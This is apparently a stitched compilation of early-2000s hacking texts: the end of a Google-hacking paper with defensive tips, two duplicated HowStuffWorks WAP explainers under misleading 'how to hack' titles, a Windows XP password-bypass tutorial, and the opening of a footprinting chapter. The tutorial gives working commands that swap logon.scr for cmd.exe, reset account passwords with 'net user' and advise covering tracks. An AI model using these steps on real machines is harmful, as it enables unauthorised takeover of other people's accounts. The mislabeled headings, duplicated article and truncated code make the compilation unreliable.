variables passed to the server, a GooPot administrator can learn about new web search
techniques being employed in the wild and subsequently protect his site from similar
queries. Beyond a simple pagepot, GooPot uses enticements based on the many
techniques outlined in the googledorks collection and this document. In addition, the
GooPot more closely resembles the juicy targets that Google hackers typically go after.
Johnny Long, the administrator of the googledorks list, utilizes the GooPot to discover
new search types and publicize them in the form of googledorks listings, creating a
self-sustaining cycle for learning about, and protecting against, search engine attacks.
Although the GooPot system is currently not publicly available, expect it to be made
available early 2Q 2004.
A word about how Google finds pages (Opera)
Although the concept of web crawling is fairly straightforward, Google has created other
methods for learning about new web pages. Most notably, Google has incorporated a
feature into the latest release of the Opera web browser. When an Opera user types a
URL into the address bar, the URL is sent to Google, and is subsequently crawled by
Google’s bots. According to the FAQ posted at http://www.opera.com/adsupport:
“The Google system serves advertisements and related searches to the Opera
browser through the Opera browser banner 468x60 format. Google determines
what ads and related searches are relevant based on the URL and content of the
page you are viewing and your IP address, which are sent to Google via the
Opera browser.”
As of the time of this writing it is unclear whether Google includes the link
in its search engine. However, testing shows that when an unindexed URL
(http://johnny.ihackstuff.com/temp/suck.html) was entered into Opera 7.2.3, a Googlebot
crawled the URL moments later as shown by the following access.log excerpts:
64.68.87.41 - "GET /robots.txt HTTP/1.0" 200 220 "-" "Mediapartners-Google/2.1 (+http://www.googlebot.com/bot.html)"
64.68.87.41 - "GET /temp/suck.html HTTP/1.0" 200 5 "-" "Mediapartners-Google/2.1 (+http://www.googlebot.com/bot.html)"
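Entries like these can be picked out of a log automatically. The sketch below assumes the abbreviated log layout shown in the excerpt (address, request, status, size, referrer, user agent); a real access.log may carry extra fields such as a timestamp, in which case the pattern would need adjusting. The function name is hypothetical.

```python
import re

# Pattern for the abbreviated log layout used in the excerpt above.
LOG_PATTERN = re.compile(
    r'^(?P<ip>\S+) - "(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+) "(?P<referrer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def google_crawler_hits(lines):
    """Return (ip, path) pairs for requests whose user agent mentions Google."""
    hits = []
    for line in lines:
        match = LOG_PATTERN.match(line.strip())
        if match and "google" in match.group("agent").lower():
            hits.append((match.group("ip"), match.group("path")))
    return hits


sample_log = [
    '64.68.87.41 - "GET /temp/suck.html HTTP/1.0" 200 5 "-" '
    '"Mediapartners-Google/2.1 (+http://www.googlebot.com/bot.html)"',
]
print(google_crawler_hits(sample_log))
```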
The privacy implications of this could be staggering, especially if Opera users expect
visited URLs to remain private.
This feature can be turned off within Opera by selecting “Show generic selection of
graphical ads” from the “File -> Preferences -> Advertising” screen.
Protecting yourself from Google hackers
1. Keep your sensitive data off the web!
Even if you think you’re only putting your data on a web site temporarily, there’s a
good chance that you’ll either forget about it, or that a web crawler might find it.
Consider more secure ways of sharing sensitive data such as SSH/SCP or
encrypted email.
2. Googledork!
• Use the techniques outlined in this paper to check your own site for
sensitive information or vulnerable files.
• Use gooscan (from http://johnny.ihackstuff.com) to scan your site for bad
stuff, but first get advance express permission from Google! Without
advance express permission, Google could come after you for violating
their terms of service. The author is currently not aware of the exact
implications of such a violation. But why anger the “Goo-Gods”?!?
• Check the official googledorks website (http://johnny.ihackstuff.com) on a
regular basis to keep up on the latest tricks and techniques.
3. Consider removing your site from Google’s index.
The Google webmaster FAQ located at http://www.google.com/webmasters/
provides invaluable information about ways to properly protect and/or expose
your site to Google. From that page:
“Please have the webmaster for the page in question contact us with proof that
he/she is indeed the webmaster. This proof must be in the form of a root level
page on the site in question, requesting removal from Google. Once we receive
the URL that corresponds with this root level page, we will remove the offending
page from our index.”
In some cases, you may want to remove individual pages or snippets from Google’s
index. This is also a straightforward process which can be accomplished by
following the steps outlined at http://www.google.com/remove.html.
4. Use a robots.txt file.
Web crawlers are supposed to follow the robots exclusion standard found at
http://www.robotstxt.org/wc/norobots.html. This standard outlines the procedure
for “politely requesting” that web crawlers ignore all or part of your website. I
must note that hackers may not have any such scruples, as this file is merely a
suggestion. The major search engines’ crawlers honor this file and its contents.
For examples and suggestions for using a robots.txt file, see the above URL on
robotstxt.org.
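As a rough illustration, Python's standard urllib.robotparser module can show how a well-behaved crawler would interpret a robots.txt file. The file contents and URLs below are made-up examples, and the helper function is hypothetical.

```python
from urllib.robotparser import RobotFileParser

# Example robots.txt asking all crawlers to stay out of two directories.
ROBOTS_TXT = """\
User-agent: *
Disallow: /admin/
Disallow: /backup/
"""


def allowed(url, user_agent="Googlebot"):
    """Report whether a polite crawler may fetch the given URL."""
    parser = RobotFileParser()
    parser.parse(ROBOTS_TXT.splitlines())
    return parser.can_fetch(user_agent, url)


print(allowed("http://www.example.com/index.html"))
print(allowed("http://www.example.com/admin/userlist/index.html"))
```

The check only models crawlers that choose to obey the file; it does nothing to stop a visitor who requests the excluded pages directly.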
Thanks and shouts
First, I would like to thank God for taking the time to pierce my way-logical mind with
the unfathomable gifts of sight by faith and eternal life through the sacrifice of Jesus
Christ.
Thanks to my family for putting up with the analog version of j0hnny.
Shouts to the STRIKEFORCE, “Gotta_Getta_Hotdog” Murray, “Re-Ron” Shaffer, “2 cute
to B single” K4yDub, “Nice BOOOOOSH” Arnold, “Skull Thicker than a Train Track”
Chapple, “Bitter Bagginz” Carter, Fosta’ (student=teacher;), Tiger “Lost my badge”
Woods, LARA “Shake n Bake” Croft, “BananaJack3t” Meyett, Patr1ckhacks, Czup, Mike
“Scan Master, Scan Faster” Walker, “Mr. I Love JAVA” Webster, “Soul Sistah” G Collins,
Chris, Carey, Matt, KLOWE, haywood, micah. Shouts to those who have passed on:
Chris, Ross, Sanguis, Chuck, Troy, Brad.
Shouts to Joe “BinPoPo”, Steve Williams (by far the most worthy defender I’ve had the
privilege of knowing) and to “Bigger is Better” Fr|tz.
Thanks to my website members for the (admittedly thin) stream of feedback and
Googledork additions. Maybe this document will spur more submissions.
Thanks to JeiAr at GulfTech Security
of Appdetective fame, and Mike “Supervillain” Carter for the outstanding contributions to
the googledorks database.
Thanks to Chris O'Ferrell (www.netsec.net), Yuki over at the Washington Post, Slashdot,
and TheRegister.co.uk for all the media coverage. While I’m thanking my referrers, I
should mention Scott Granneman for the front-page SecurityFocus article that was all
about Googledorking. He was nice enough to link me and call Googledorks his “favorite
site” for Google hacking even though he didn’t mention me by name or return any of my
emails. I’m not bitter though… it sure generated a lot of traffic! After all the good press,
it’s wonderful to be able to send out a big =PpPPpP to NewScientist Magazine for their
particularly crappy coverage of this topic. Just imagine, all this traffic could have been
yours if you had handled the story properly.
Shouts out to Seth Fogie, Anton Rager, Dan Kaminsky, rfp, Mike Schiffman, Dominique
Brezinski, Tan, Todd, Christopher (and the whole packetstorm crew), Bruce Potter,
Dragorn, and Muts (mutsonline, whitehat.co.il) and my long lost friend Topher.
Hello’s out to my good friends SNShields and Nathan.
When in Vegas, be sure to visit any of the world-class properties of the MGM/Mirage or
visit them online at http://mgmmirage.com. =)
HOW TO BECOME A HACKER
by Jeff Tyson
You and millions of other people around the world use the Internet every day to communicate with others, follow the stock market, keep up with the news, check the weather, make travel plans, conduct business, shop, entertain yourself and learn. Staying connected has become so important that it's hard to get away from your computer and your Internet connection because you might miss an e-mail message, an update on your stock or some news you need to know. With your business or your personal life growing more dependent on electronic communication over the Internet, you might be ready to take the next step and get a device that allows you to access the Internet on the go.
A cell phone with wireless Internet
That's where wireless Internet comes in. You've probably seen news or advertising about cell phones and PDAs that let you receive and send e-mail. This seems a logical next step, but there are some questions that come up when you think about going mobile with the Internet. Will you still be able to surf the Web? How fast will you be able to get the information you need? You might have heard of the Wireless Application Protocol (WAP) and wonder how it works. In this edition of HowStuffWorks, you will learn just what WAP is, why it is needed and what devices use it.
The Cellular Explosion
Probably the most important factor in the birth of wireless Internet has been the proliferation of digital
cell phones in the last few years. The expanding network of digital cellular and personal
communication services (PCS) has created a solid foundation for wireless Internet services. It is
estimated that there are more than 50 million Web-enabled cell phones in use. In 1997, Nokia,
Motorola, Ericsson and Phone.com came together to create the WAP because they believed that a
universal standard is critical to the successful implementation of wireless Internet. Since then, more
than 350 companies have joined them in the WAP Forum.
A typical digital cell phone
Making a Web site accessible through a wireless device is quite a challenge. So far, only a small portion of the more than a billion Web sites provide any wireless Internet content. As the use of WAP-enabled devices grows, you can expect that many more Web sites will be interested in creating wireless content.
WAP is designed to work on any of the existing wireless services, using standards such as:
• Short Message Service (SMS)
• High-Speed Circuit-Switched Data (CSD)
• General Packet Radio Service (GPRS)
• Unstructured Supplementary Services Data (USSD)
Wireless Markup Language
WAP uses Wireless Markup Language (WML), which includes the Handheld Device Markup Language (HDML) developed by Phone.com.
WML can also trace its roots to eXtensible Markup Language (XML). A markup language is a way of adding information to your content that tells the device receiving the content what to do with it. The best known markup language is Hypertext Markup Language (HTML). Unlike HTML, WML is considered a meta language. Basically, this means that in addition to providing predefined tags, WML lets you design your own markup language components. WAP also allows the use of standard Internet protocols and formats such as UDP, IP and XML.
There are three main reasons why wireless Internet needs the Wireless Application Protocol:
• Transfer speed
• Size and readability
• Navigation
Most cell phones and Web-enabled PDAs have data transfer rates of 14.4 Kbps or less. Compare this to a typical 56 Kbps modem, a cable modem or a DSL connection. Most Web pages today are full of graphics that would take an unbearably long time to download at 14.4 Kbps. Wireless Internet content is typically text-based in order to solve this problem.
The main Amazon page for regular Internet
The main Amazon page for wireless Internet
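A quick calculation makes the speed gap concrete. The 100-kilobyte page size is an assumed figure chosen for illustration, and the function ignores protocol overhead and latency.

```python
def download_seconds(page_kilobytes, link_kbps):
    """Ideal transfer time for a page of the given size over the given link."""
    bits = page_kilobytes * 1024 * 8
    return bits / (link_kbps * 1000)


# Assumed 100 KB graphics-heavy page on a wireless link and on a dial-up modem.
print(round(download_seconds(100, 14.4), 1))
print(round(download_seconds(100, 56), 1))
```

At 14.4 Kbps the assumed page takes roughly four times as long as on a 56 Kbps modem, which is why text-only versions matter on wireless devices.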
The relatively small size of the LCD on a cell phone or PDA presents another challenge. Most Web pages are designed for a resolution of 640x480 pixels, which is fine if you are reading on a desktop or a laptop. The page simply does not fit on a wireless device's display, which might be 150x150 pixels. Also, the majority of wireless devices use monochrome screens. Pages are harder to read when font and background colors become similar shades of gray.
Navigation is another issue. You make your way through a Web page with points and clicks using a mouse; but if you are using a wireless device, you often use one hand to scroll keys.
WAP takes each of these limitations into account and provides a way to work with a typical wireless device.
Wireless Application Protocol
Here's what happens when you access a Web site using a WAP-enabled device:
• You turn on the device and open the minibrowser.
• The device sends out a radio signal, searching for service.
• A connection is made with your service provider.
• You select a Web site that you wish to view.
• A request is sent to a gateway server using WAP.
• The gateway server retrieves the information via HTTP from the Web site.
• The gateway server encodes the HTTP data as WML.
• The WML-encoded data is sent to your device.
• You see the wireless Internet version of the Web page you selected.
To create wireless Internet content, a Web site creates special text-only or low-graphics versions of the site. The data is sent in HTTP form by a Web server to a WAP gateway. This system includes the WAP encoder, script compiler and protocol adapters to convert the HTTP information to WML. The gateway then sends the converted data to the WAP client on your wireless device.
What happens between the gateway and the client relies on features of different parts of the WAP protocol stack. Let's take a look at each part of the stack:
WAP protocol stack
• WAE - The Wireless Application Environment holds the tools that wireless Internet content developers use. These include WML and WMLScript, which is a scripting language used in conjunction with WML. It functions much like JavaScript.
• WSP - The Wireless Session Protocol determines whether a session between the device and the network will be connection-oriented or connectionless. In other words, it determines whether the device needs to talk back and forth with the network during a session. In a connection-oriented session, data is passed both ways between the device and the network; WSP then sends the packet to the Wireless Transaction Protocol layer (see below). If the session is connectionless, as is common when information is being broadcast or streamed from the network to the device, then WSP redirects the packet to the Wireless Datagram Protocol layer (see below).
• WTP - The Wireless Transaction Protocol acts like a traffic cop, keeping the data flowing in a logical and smooth manner. It also determines how to classify each transaction request:
   - Reliable two-way
   - Reliable one-way
   - Unreliable one-way
The WSP and WTP layers correspond to Hypertext Transfer Protocol (HTTP) in the TCP/IP protocol suite.
• WTLS - Wireless Transport Layer Security provides many of the same security features found in the Transport Layer Security (TLS) part of TCP/IP. It checks data integrity, provides encryption and performs client and server authentication.
• WDP - The Wireless Datagram Protocol works in conjunction with the network carrier layer (see below). WDP makes it easy to adapt WAP to a variety of bearers because all that needs to change is the information maintained at this level.
• Network carriers - Also called bearers, these can be any of the existing technologies that wireless providers use, as long as information is provided at the WDP level to interface WAP with the bearer.
Once the information is received by the WAP client, it is passed to the minibrowser. This is a tiny application built into the wireless device that provides the interface between the user and the wireless Internet.
The start page of a typical minibrowser: the minibrowser offers streamlined functionality.
The minibrowser does not offer anything more than basic navigation. Wireless Internet is still a long way from being a true alternative to the normal Internet. It is really positioned right now for people
the specifications of the WAP standard to ensure that it evolves in a timely and useful manner.
HOW TO HACK WIRELESS INTERNET NETWORKS
by Jeff Tyson
You and millions of other people around the world use the Internet every day to communicate with others, follow the stock market, keep up with the news, check the weather, make travel plans, conduct business, shop, entertain yourself and learn. Staying connected has become so important that it's hard to get away from your computer and your Internet connection because you might miss an e-mail message, an update on your stock or some news you need to know. With your business or your personal life growing more dependent on electronic communication over the Internet, you might be ready to take the next step and get a device that allows you to access the Internet on the go.
A cell phone with wireless Internet
That's where wireless Internet comes in. You've probably seen news or advertising about cell phones and PDAs that let you receive and send e-mail. This seems a logical next step, but there are some questions that come up when you think about going mobile with the Internet. Will you still be able to surf the Web? How fast will you be able to get the information you need? You might have heard of the Wireless Application Protocol (WAP) and wonder how it works. In this edition of HowStuffWorks, you will learn just what WAP is, why it is needed and what devices use it.
The Cellular Explosion
Probably the most important factor in the birth of wireless Internet has been the proliferation of digital cell phones in the last few years. The expanding network of digital cellular and personal communication services (PCS) has created a solid foundation for wireless Internet services. It is estimated that there are more than 50 million Web-enabled cell phones in use. In 1997, Nokia, Motorola, Ericsson and Phone.com came together to create WAP because they believed that a universal standard is critical to the successful implementation of wireless Internet. Since then, more than 350 companies have joined them in the WAP Forum.
A typical digital cell phone
Making a Web site accessible through a wireless device is quite a challenge. So far, only a small portion of the more than a billion Web sites provide any wireless Internet content. As the use of WAP-enabled devices grows, you can expect that many more Web sites will be interested in creating wireless content.
WAP is designed to work on any of the existing wireless services, using standards such as:
• Short Message Service (SMS)
• High-Speed Circuit-Switched Data (HSCSD)
• General Packet Radio Service (GPRS)
• Unstructured Supplementary Services Data (USSD)
Wireless Markup Language
WAP uses Wireless Markup Language (WML), which includes the Handheld Device Markup Language (HDML) developed by Phone.com.
WML can also trace its roots to eXtensible Markup Language (XML). A markup language is a way of adding information to your content that tells the device receiving the content what to do with it. The best known markup language is Hypertext Markup Language (HTML). Unlike HTML, WML is defined as an application of XML, which is a meta language. Basically, this means that in addition to providing a syntax for tags, XML lets you design your own markup language components, and WML is one such set of components. WAP also allows the use of standard Internet technologies such as UDP, IP and XML.
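To make the idea of a WML document more concrete, here is a minimal sketch in Python that builds a one-card WML "deck" and checks that it is well-formed XML. The function name `build_wml_deck`, the card id and the sample text are assumptions made for illustration; the DOCTYPE shown is the public identifier of the WML 1.1 DTD.

```python
import xml.etree.ElementTree as ET

# XML prolog and DOCTYPE for a WML 1.1 deck.
WML_PROLOG = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.1//EN" '
    '"http://www.wapforum.org/DTD/wml_1.1.xml">\n'
)


def build_wml_deck(card_id: str, title: str, paragraphs: list[str]) -> str:
    """Return a WML deck with a single card holding the given paragraphs."""
    wml = ET.Element("wml")
    card = ET.SubElement(wml, "card", {"id": card_id, "title": title})
    for text in paragraphs:
        p = ET.SubElement(card, "p")
        p.text = text  # ElementTree escapes &, < and > on output
    return WML_PROLOG + ET.tostring(wml, encoding="unicode")


if __name__ == "__main__":
    # Hypothetical content for a text-only weather page.
    print(build_wml_deck("home", "Weather", ["Sunny & warm", "High: 75"]))
```

A deck can hold several cards, which lets a device download a few small screens in one request; this sketch only emits one.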
There are three main reasons why wireless Internet needs the Wireless Application Protocol:
• Transfer speed
• Size and readability
• Navigation
Most cell phones and Web-enabled PDAs have data transfer rates of 14.4 Kbps or less. Compare this to a typical 56 Kbps modem, a cable modem or a DSL connection. Most Web pages today are full of graphics that would take an unbearably long time to download at 14.4 Kbps. Wireless Internet content is typically text-based in order to solve this problem.
The main Amazon page for regular Internet
The main Amazon page for wireless Internet
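To put the transfer rates above in perspective, the following Python sketch works out ideal download times. The page sizes (a 100,000-byte graphical page and a 2,000-byte text page) are assumptions chosen for illustration, Kbps is taken to mean 1,000 bits per second, and protocol overhead and latency are ignored.

```python
def download_seconds(size_bytes: int, rate_kbps: float) -> float:
    """Ideal transfer time in seconds, ignoring overhead and latency."""
    bits = size_bytes * 8
    return bits / (rate_kbps * 1000)


if __name__ == "__main__":
    graphical_page = 100_000  # assumed size of a graphics-heavy page, in bytes
    text_page = 2_000         # assumed size of a text-only wireless page, in bytes

    print(round(download_seconds(graphical_page, 14.4), 1))  # 55.6
    print(round(download_seconds(graphical_page, 56), 1))    # 14.3
    print(round(download_seconds(text_page, 14.4), 1))       # 1.1
```

Under these assumptions the graphical page takes almost a minute at 14.4 Kbps, while the text-only page arrives in about a second.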
The relatively small size of the LCD on a cell phone or PDA presents another challenge. Most Web pages are designed for a resolution of 640x480 pixels, which is fine if you are reading on a desktop or a laptop. The page simply does not fit on a wireless device's display, which might be 150x150 pixels. Also, the majority of wireless devices use monochrome screens. Pages are harder to read when font and background colors become similar shades of gray.
Navigation is another issue. You make your way through a Web page with points and clicks using a mouse; but if you are using a wireless device, you often have only a few scroll keys, operated with one hand.
WAP takes each of these limitations into account and provides a way to work with a typical wireless device.
Wireless Application Protocol
Here's what happens when you access a Web site using a WAP-enabled device:
• You turn on the device and open the minibrowser.
• The device sends out a radio signal, searching for service.
• A connection is made with your service provider.
• You select a Web site that you wish to view.
• A request is sent to a gateway server using WAP.
• The gateway server retrieves the information via HTTP from the Web site.
• The gateway server encodes the HTTP data as WML.
• The WML-encoded data is sent to your device.
• You see the wireless Internet version of the Web page you selected.
To create wireless Internet content, a Web site creates special text-only or low-graphics versions of the site. The data is sent in HTTP form by a Web server to a WAP gateway. The gateway includes the WAP encoder, script compiler and protocol adapters that convert the HTTP information to WML. The gateway then sends the converted data to the WAP client on your wireless device.
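The gateway's role in the steps above can be sketched roughly as follows. This is a toy model, not how a production WAP gateway works: `gateway_handle`, `html_to_wml` and the `fetch` callback are hypothetical names, the HTTP retrieval is replaced by a stand-in function, and the "encoding" step simply keeps the text of an HTML page and wraps it in a WML card.

```python
from html.parser import HTMLParser
from typing import Callable
from xml.sax.saxutils import escape, quoteattr


class _TextExtractor(HTMLParser):
    """Collect the non-empty text chunks of an HTML page, dropping all tags."""

    def __init__(self) -> None:
        super().__init__()
        self.chunks: list[str] = []

    def handle_data(self, data: str) -> None:
        text = data.strip()
        if text:
            self.chunks.append(text)


def html_to_wml(html: str, title: str) -> str:
    """Wrap the text content of an HTML page in a single WML card."""
    extractor = _TextExtractor()
    extractor.feed(html)
    extractor.close()
    paragraphs = "".join(f"<p>{escape(chunk)}</p>" for chunk in extractor.chunks)
    return f'<wml><card id="main" title={quoteattr(title)}>{paragraphs}</card></wml>'


def gateway_handle(url: str, fetch: Callable[[str], str]) -> str:
    """Retrieve a page via the supplied fetch function and return it as WML."""
    html = fetch(url)                     # gateway retrieves the page over HTTP
    return html_to_wml(html, title=url)   # gateway encodes the result as WML


if __name__ == "__main__":
    def fake_fetch(url: str) -> str:
        # Stand-in for a real HTTP request; returns a canned page.
        return "<html><body><h1>News</h1><p>Rain &amp; wind</p><img src='x.gif'></body></html>"

    print(gateway_handle("http://example.com/", fake_fetch))
```

Passing the fetch step in as a function keeps the sketch runnable without a network connection; images are dropped entirely, which mirrors the text-only content described above.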
What happens between the gateway and the client relies on features of different parts of the WAP protocol stack. Let's take a look at each part of the stack:
• WAE - The Wireless Application Environment holds the tools that wireless Internet content developers use. These include WML and WMLScript, which is a scripting language used in conjunction with WML. It functions much like JavaScript.
• WSP - The Wireless Session Protocol determines whether a session between the device and the network will be connection-oriented or connectionless. In other words, it decides whether the device needs to talk back and forth with the network during a session. In a connection-oriented session, data is passed both ways between the device and the network; WSP then sends the packet to the Wireless Transaction Protocol layer (see below). If the session is connectionless, as is common when information is being broadcast or streamed from the network to the device, WSP redirects the packet to the Wireless Datagram Protocol layer (see below).
• WTP - The Wireless Transaction Protocol acts like a traffic cop, keeping the data flowing in a logical and smooth manner. It also determines how to classify each transaction request:
▪ Reliable two-way
▪ Reliable one-way
▪ Unreliable one-way
The WSP and WTP layers correspond to Hypertext Transfer Protocol (HTTP) in the TCP/IP protocol suite.
• WTLS - Wireless Transport Layer Security provides many of the same security features found in the Transport Layer Security (TLS) part of TCP/IP. It checks data integrity, provides encryption and performs client and server authentication.
• WDP - The Wireless Datagram Protocol works in conjunction with the network carrier layer (see below). WDP makes it easy to adapt WAP to a variety of bearers because all that needs to change is the information maintained at this level.
• Network carriers - Also called bearers, these can be any of the existing technologies that wireless providers use, as long as information is provided at the WDP level to interface WAP with the bearer.
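The layering described in the list above can be modeled in a few lines of Python. This is only an illustrative sketch: the enum and function names are invented for the example, and the `secure` flag (whether WTLS is inserted into the path) is an assumption, since the text does not say when WTLS is used.

```python
from enum import Enum


class SessionMode(Enum):
    CONNECTION_ORIENTED = "connection-oriented"
    CONNECTIONLESS = "connectionless"


class TransactionClass(Enum):
    RELIABLE_TWO_WAY = "reliable two-way"
    RELIABLE_ONE_WAY = "reliable one-way"
    UNRELIABLE_ONE_WAY = "unreliable one-way"


def layers_below_wae(mode: SessionMode, secure: bool = False) -> list[str]:
    """Return the layers a packet passes through, from WSP down to the bearer."""
    path = ["WSP"]
    if mode is SessionMode.CONNECTION_ORIENTED:
        path.append("WTP")   # connection-oriented sessions go through WTP
    if secure:
        path.append("WTLS")  # assumed optional security layer
    path += ["WDP", "bearer"]
    return path


def is_reliable(transaction: TransactionClass) -> bool:
    """True for the two transaction classes described as reliable."""
    return transaction is not TransactionClass.UNRELIABLE_ONE_WAY


if __name__ == "__main__":
    print(layers_below_wae(SessionMode.CONNECTION_ORIENTED, secure=True))
    print(layers_below_wae(SessionMode.CONNECTIONLESS))
    print(is_reliable(TransactionClass.UNRELIABLE_ONE_WAY))
```

The connectionless path skips WTP entirely, which is the routing decision the WSP bullet describes.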
Once the information is received by the WAP client, it is passed to the minibrowser. This is a tiny application built into the wireless device that provides the interface between the user and the wireless Internet.
The start page of a typical minibrowser: the minibrowser offers streamlined functionality.
The minibrowser does not offer anything more than basic navigation. Wireless Internet is still a long way from being a true alternative to the normal Internet. It is really positioned right now for people
the specifications of the WAP standard to ensure that it evolves in a timely and useful manner.
How to hack Windows XP Admin Passwords the easy way
by Estyle, Jaoibh and Azrael
------------------------------------------------------------------------------
This hack will only work if the person that owns the machine has no intelligence. This is how it works:
When you or anyone installs Windows XP for the first time, you're asked to put in your username and up to five others.
Now, unbeknownst to a lot of people, this is the only place in Windows XP where you can set a password on the default Administrator Diagnostic Account. This means that to bypass most administrator accounts on Windows XP, all you have to do is boot to safe mode by pressing F8 during boot-up and choosing it. Log into the Administrator Account and create your own account or change the password on the current account.
This only works if the user did not specify a password for the Administrator Account during setup.
This has worked for me on both Windows XP Home and Pro.
-----------------------------------------------------------------------------
Now this one seems to be machine dependent; it works randomly (don't know why).
If you log into a limited account on your target machine and open up a DOS prompt, then enter this set of commands exactly:
(This appeared on www.astalavista.com a few days ago, but I found that it wouldn't work on the welcome screen of a normally booted machine.)
-----------------------------------------------------------------------------
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backs up logon.scr
copy cmd.exe temphack\cmd.exe *backs up cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
-----------------------------------------------------------------------------
What you have just done is back up the command program and the screen saver file, then put the command program in place of the logon screen saver, so that when the machine starts the screen saver you get an unprotected DOS prompt without logging into XP.
Once this happens, enter this command, minus the quotes:
"net user <account name> <new password>"
For example, if the Administrator Account is called Frank and you want the password blah, enter this:
"net user Frank blah"
This changes the password on Frank's account to blah, and you're in.
Have fun
P.S. Don't forget to copy the contents of temphack back into the system32 dir to cover tracks.
Any updates, Errors, Suggestions or just general comments mail them to either
Estyle89@hotmail.com jaoibh@hotmail.com
Admin Access in a locked Environment.
This is straight from a brainchild. It makes so much sense that no one ever thought to do it. Enjoy. Also be sure to undo what you have done, or any machine that you did the hack on will show what you did when the screen saver comes up. The only hard part is finding your way to the C:\ prompt or MS-DOS. So begin.
If you can log in as an account, drop to DOS (Start -> Run -> cmd) and at the C: prompt type the following (assuming default install locations):
C:\> cd \winnt\system32
C:\winnt\system32> copy logon.scr logon.scr.old
C:\winnt\system32> del logon.scr
C:\winnt\system32> copy cmd.exe logon.scr
Now log off the machine. logon.scr is the screen saver that kicks in after 15 minutes of not touching the keyboard or mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up; then just run C:\> net user administrator and then log in with the new account.
This might work: as long as the administrator didn't change the default permissions on C:\winnt and C:\winnt\system32, you should be golden.
NETWORK SECURITY EXPOSED!!!!!(SOLUTIONS)
CHAPTER 1
Footprinting
Before the real fun for the hacker begins, three essential steps must be performed.
This chapter will discuss the first one—footprinting—the fine art of gathering target
information. For example, when thieves decide to rob a bank, they don’t just walk
in and start demanding money (not the smart ones, anyway). Instead, they take great
pains in gathering information about the bank—the armored car routes and delivery
times, the video cameras, and the number of tellers, escape exits, and anything else that
will help in a successful misadventure.
The same requirement applies to successful attackers. They must harvest a wealth of
information to execute a focused and surgical attack (one that won’t be readily caught).
As a result, attackers will gather as much information as possible about all aspects of an
organization’s security posture. Hackers end up with a unique footprint or profile of their
Internet, remote access, and intranet/extranet presence. By following a structured methodology,
attackers can systematically glean information from a multitude of sources to
compile this critical footprint on any organization.
WHAT IS FOOTPRINTING?
The systematic footprinting of an organization enables attackers to create a complete profile
of an organization’s security posture. By using a combination of tools and techniques,
attackers can take an unknown quantity (Widget Company’s Internet connection) and reduce
it to a specific range of domain names, network blocks, and individual IP addresses
of systems directly connected to the Internet. While there are many types of footprinting
techniques, they are primarily aimed at discovering information related to the following
environments: Internet, intranet, remote access, and extranet. Table 1-1 depicts these environments
and the critical information an attacker will try to identify.
Why Is Footprinting Necessary?
Footprinting is necessary to systematically and methodically ensure that all pieces of information
related to the aforementioned technologies are identified. Without a sound
methodology for performing this type of reconnaissance, you are likely to miss key pieces
of information related to a specific technology or organization. Footprinting is often the
most arduous task of trying to determine the security posture of an entity; however, it is
one of the most important. Footprinting must be performed accurately and in a controlled
fashion.
INTERNET FOOTPRINTING
While many footprinting techniques are similar across technologies (Internet and
intranet), this chapter will focus on footprinting an organization’s Internet connection(s).
Remote access will be covered in detail in Chapter 9.
4 Hacking Exposed: Network Security Secrets and Solutions
It is difficult to provide a step-by-step guide on footprinting because it is an activity
that may lead you down several paths. However, this chapter delineates basic steps that
should allow you to complete a thorough footprint analysis. Many of these techniques
can be applied to the other technologies mentioned earlier.
Chapter 1: Footprinting 5
Technology      Identifies
Internet        Domain name
                Network blocks
                Specific IP addresses of systems reachable via the Internet
                TCP and UDP services running on each system identified
                System architecture (for example, SPARC vs. X86)
                Access control mechanisms and related access control lists (ACLs)
                Intrusion detection systems (IDSes)
                System enumeration (user and group names, system banners, routing tables, SNMP information)
Intranet        Networking protocols in use (for example, IP, IPX, DecNET, and so on)
                Internal domain names
                Network blocks
                Specific IP addresses of systems reachable via intranet
                TCP and UDP services running on each system identified
                System architecture (for example, SPARC vs. X86)
                Access control mechanisms and related access control lists (ACLs)
                Intrusion detection systems
                System enumeration (user and group names, system banners, routing tables, SNMP information)
Remote access   Analog/digital telephone numbers
                Remote system type
                Authentication mechanisms
                VPNs and related protocols (IPSEC, PPTP)
Extranet        Connection origination and destination
                Type of connection
                Access control mechanism
Table 1-1. Environments and the Critical Information Attackers Can Identify
Step 1. Determine the Scope of Your Activities
The first item to address is to determine the scope of your footprinting activities. Are you
going to footprint an entire organization, or are you going to limit your activities to certain
locations (for example, corporate vs. subsidiaries)? In some cases, it may be a daunting
task to determine all the entities associated with a target organization. Luckily, the
Internet provides a vast pool of resources you can use to help narrow the scope of activities
and also provides some insight as to the types and amount of information publicly
available about your organization and its employees.
Open Source Search
Popularity: 9
Simplicity: 9
Impact: 2
Risk Rating: 7
As a starting point, peruse the target organization’s web page if they have one. Many
times an organization’s web page provides a ridiculous amount of information that can
aid attackers. We have actually seen organizations list security configuration options for
their firewall system directly on their Internet web server. Other items of interest include
- Locations
- Related companies or entities
- Merger or acquisition news
- Phone numbers
- Contact names and email addresses
- Privacy or security policies indicating the types of security mechanisms in place
- Links to other web servers related to the organization
In addition, try reviewing the HTML source code for comments. Many items not
listed for public consumption are buried in HTML comments, which open with “<!--”
and close with “-->.” Viewing the source code offline may be faster than viewing it online, so it is often
beneficial to mirror the entire site for offline viewing. Having a copy of the site locally may
allow you to programmatically search for comments or other items of interest, thus making
your footprinting activities more efficient. Wget (http://www.gnu.org/software/wget/wget.html)
for UNIX and Teleport Pro (http://www.tenmax.com/teleport/home.htm) for Windows
are great utilities to mirror entire web sites.
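As a rough illustration of searching a local mirror for comments, the following Python sketch collects HTML comments from saved pages so you can review what your own site discloses. The function names and the idea of walking a mirror directory are assumptions made for this example; only the standard library is used.

```python
from html.parser import HTMLParser
from pathlib import Path


class CommentCollector(HTMLParser):
    """Collect the text of every HTML comment seen while parsing."""

    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        # data is the text between "<!--" and "-->"
        self.comments.append(data.strip())


def extract_comments(html_text):
    """Return a list of comment strings found in html_text."""
    collector = CommentCollector()
    collector.feed(html_text)
    collector.close()
    return collector.comments


def scan_mirror(root):
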